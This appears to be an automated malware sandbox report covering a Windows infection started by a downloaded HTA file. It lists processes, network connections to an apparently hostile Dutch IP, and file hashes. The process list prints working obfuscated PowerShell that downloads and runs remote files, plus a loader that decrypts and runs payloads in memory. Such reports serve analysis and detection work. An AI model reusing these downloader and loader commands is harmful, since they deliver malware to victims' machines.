"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.13.1180940323\1997716798" -childID 12 -isForBrowser -prefsHandle 6040 -prefMapHandle 5956 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ec513b2-3673-4470-b3ef-251a8ae8dcf2} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6056 2e2a5971858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.14.1840811761\1315247919" -childID 13 -isForBrowser -prefsHandle 6092 -prefMapHandle 5692 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {856cd291-dc3a-42b0-88b2-1e5aa830bba5} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 8148 2e2a5df8258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.15.1536033044\310627983" -childID 14 -isForBrowser -prefsHandle 6652 -prefMapHandle 6700 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b9b3bf0-6f97-4a4c-b559-d964be68553c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 7724 2e2a4b94a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.16.615557995\1179932124" -childID 15 -isForBrowser -prefsHandle 7992 -prefMapHandle 6700 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b80b8ef-e7b3-4a6b-8e67-22d19d179b12} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5436 2e2a4eb4b58 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\index.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Note.txt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\15.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\15.bat"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.17.1721563505\970642768" -childID 16 -isForBrowser -prefsHandle 1288 -prefMapHandle 7468 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7c8016a-e570-4d3f-88db-dfe68a2b2196} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 4692 2e2a8e1b358 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\15.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Downloads\15.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\15.bat
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.18.613164890\1751689591" -childID 17 -isForBrowser -prefsHandle 7844 -prefMapHandle 6404 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c038c7b-35d0-4a97-b254-684fa5a3c099} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3600 2e2aaf7f858 tab
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\jiteon.xlsx"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| N/A | 127.0.0.1:54846 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 35.83.153.5:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | 128.96.222.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.153.83.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | berryz.upnl.org | udp |
| US | 8.8.8.8:53 | upnl.org | udp |
| US | 8.8.8.8:53 | berryz.upnl.org | udp |
| US | 8.8.8.8:53 | upnl.org | udp |
| US | 8.8.8.8:53 | upnl.org | udp |
| US | 8.8.8.8:53 | berryz.upnl.org | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| N/A | 127.0.0.1:54855 | tcp | |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 216.239.32.21:80 | virustotal.com | tcp |
| US | 216.239.32.21:80 | virustotal.com | tcp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 216.239.32.21:443 | virustotal.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| GB | 142.250.180.3:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | 21.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.34.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.200.35:443 | recaptcha.net | tcp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.200.35:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 72.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:4449 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| NL | 193.222.96.128:7287 | tcp | |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| US | 8.8.8.8:53 | 114.96.222.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | upnl.org | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| GB | 142.250.200.35:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
Files
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 693ff32e4cd773f59817c7b3639281b3 |
| SHA1 | 60051804fd3d8ffd383a1231f1ed6ec5a0e0b36a |
| SHA256 | 460980fc6371a63ae9ed9d780e92bb009b5d89e6ea58e8d6b2dc1f349e2f7fda |
| SHA512 | 9f83776d152be6a6c0adf5190aef88a03b4e2048544f5cd1188d836e1e4dfcf8661de1158d7dcffedaa7bc6e0e7beb32733cb9597842a0015338d2d577a79197 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs.js
| MD5 | 79a5f7718408e1c574181045c3006fa4 |
| SHA1 | 9c84a78d7f434cd6df4ed2ca621cffa21bed9bd6 |
| SHA256 | 2e8ff6d17d34689bee6a4c4554f1bf74394c64006c99cadfadb9ab7bf3c2d35c |
| SHA512 | 040b9be08a0d9d9904d79e5f8ea8f6dca5a5c5d2f8f6dbbb80b7637407ecf53aa9537286e9b17d15737284e67e7b9b2c9a7e67f4fb6764422dd7b23aa228db64 |
C:\Users\Admin\Downloads\15.9xj2mza4.bat.part
| MD5 | 35c6d717dae5b57fdaf92e00d1002b73 |
| SHA1 | 88111931546999a17cf45b2d1b4d65698d9d4fb4 |
| SHA256 | 63f7b147b822af439064d521b1e3aeef276d835878cb5236bb8589d7a006dd91 |
| SHA512 | 3374b3e1d3c2c01683300029c8d5b31bc3221854a76326d060b9e67c3cbdc38502c64b108da68fa7f030ce45d48bf7a2494bbd2ce71c97b4b9459fb12b5012a0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 9d45577855de876aa82d2816d5c0da84 |
| SHA1 | 58efc74b99f8e36891a4baac33bfbbe1978c4f33 |
| SHA256 | 0b963e26440f07e7bb70c825fa15448ed91ca64237b400adc4cb9c1a01632b1c |
| SHA512 | 7dff483423f85775f66db8665db4c6ccb20010708ea6398ae2751ff619701396c6d0ba422bb5d83d1f817e1f9c97f63681ed9062c18d5bdda0dd200da2b62fc1 |
C:\Users\Admin\Downloads\j8Xy3EYT.part
| MD5 | c4c06bc09d5d07d8abdb074e80806d07 |
| SHA1 | fd49f1d6c2fb26415c90b9e352b288f16e169b6c |
| SHA256 | c5010ef902c9a8421aaf07a4ac475667c0b2ddae0b2d4c2f4c28aa7b7f482b3d |
| SHA512 | 6a8eb776b68d500645b1b4bbc4440e8e24e6f8340e3fe560ae96b8c127b26bd3a678782306e4b049aa9d4a1fc120f782307ac2ae166c84bcf73cffcd451a0626 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js
| MD5 | 225b9b48729c3baf4366d4a7c279db3c |
| SHA1 | 38ebcb2738c9310104a241d3f56222ac589db7d6 |
| SHA256 | 7e03479ae01177c4ba7e920cfde5016e22378df53b5b6faf3a403a7946797620 |
| SHA512 | 900414ca4ac8331a08563afe87322a31786e114aaafba0130ce82556d6663e557306cae0662a603df6288d58ade1e599c9167ce47b31c85b387956149c5ccafb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a9422c71a8a8f6de90613d8206318cb5 |
| SHA1 | 79cacd76c1a999753129303f604f9f95cb6651b7 |
| SHA256 | 0a470c0602d97da0e9a4b89b8c5b121bc34bea9b7cf244ace54b61f56eaf4047 |
| SHA512 | 5f0cb53736c48e8e4dd1caad8997c2191d8839b37789715ca4574ee3d99ceabf1480b7713113c82047e8d15bd41820e5aed326d0388baeed6bdbd919a0c3fe2b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\209\{3cf30eb4-7f1e-4325-974c-30091a54e2d1}.final
| MD5 | c366a3613bd3d6329d43d12117ed4059 |
| SHA1 | d3e8e59672d2ce345769afd88a71fbb90d70943d |
| SHA256 | 582807864cf6905f2404f2bb7e84789d15afbb0bd5c9566e04cf7b8cb6c29a7b |
| SHA512 | 7087bec44839f155caa8a57a65d4fcc117796edb80a991a9bcea620be9d0a497841148f36f09fa4995ef4dd7bd65c566760ff9f32c48a154fb3cacf1737a127a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js
| MD5 | 9abc33b8ca1a06578ef8bca71ec43322 |
| SHA1 | 82c782e8fa7e29c59105cb5bb36b99f7dde34007 |
| SHA256 | 95ec09b5183c0491b2b70f2ef4fbc227ad2b2775d1b814a527015120a436455e |
| SHA512 | dabcd6aad39d47a0a2e3bba424477e9b38f6fb903db1a29bb81e91b942a16617111449cedecbe9256ec550b981f29358f02c673fd035fd0e07f6a9686e2fc521 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 024791c1cdd8a03038756126fa4a173c |
| SHA1 | 1d34791566889fbc7b846e785df9cb461e834a9b |
| SHA256 | a69a842dc910a3cc41849f0b66047e4b2debd9473562c2350444f9dc56f9cd31 |
| SHA512 | 6f98b42a0cf7967e22a15e78803887327240f17300d3a808a3c74aef4236a005db41ce78c4bcf1d6c45e377447385b5f92b3170c3749f073386bb5a22a6498e2 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\CD429C0BD381706883301C98CDE6E7D5C78016A3
| MD5 | 4861e569d02d0c578984183cd651ffe5 |
| SHA1 | 4e4dd04189d00c245c6e9dbcba9604a9177756cf |
| SHA256 | 6654c00b3a1f8791b4811c56c4efef1e28d95c1e98b3f98ac9a4ec35d6663c2b |
| SHA512 | 68f5ff9dfa9d9e5dc3b35538d715db0231bee9ef67adf0503e0a5379da69d9a4dceaba980ad41faec6c14dbe818784144ad05d277a2b41b18b9e1853f5a3be03 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 13076b32d59d01a87a9a494b07ca2d1d |
| SHA1 | 00d54b2b92e6df485121c8cf4f62fee589331cbc |
| SHA256 | 260768d4123e8488b96b6adae0079e56d3cc1e7a645c194958f1fb6d3d51f054 |
| SHA512 | 64541b6c1f923f111ef4c54364af7add46e0459e5a886ea4857670ce320aa03bb0cf13a03e7a1391ffa620a482ab653b195b2157be33815c0fd9e86584cb3dcf |
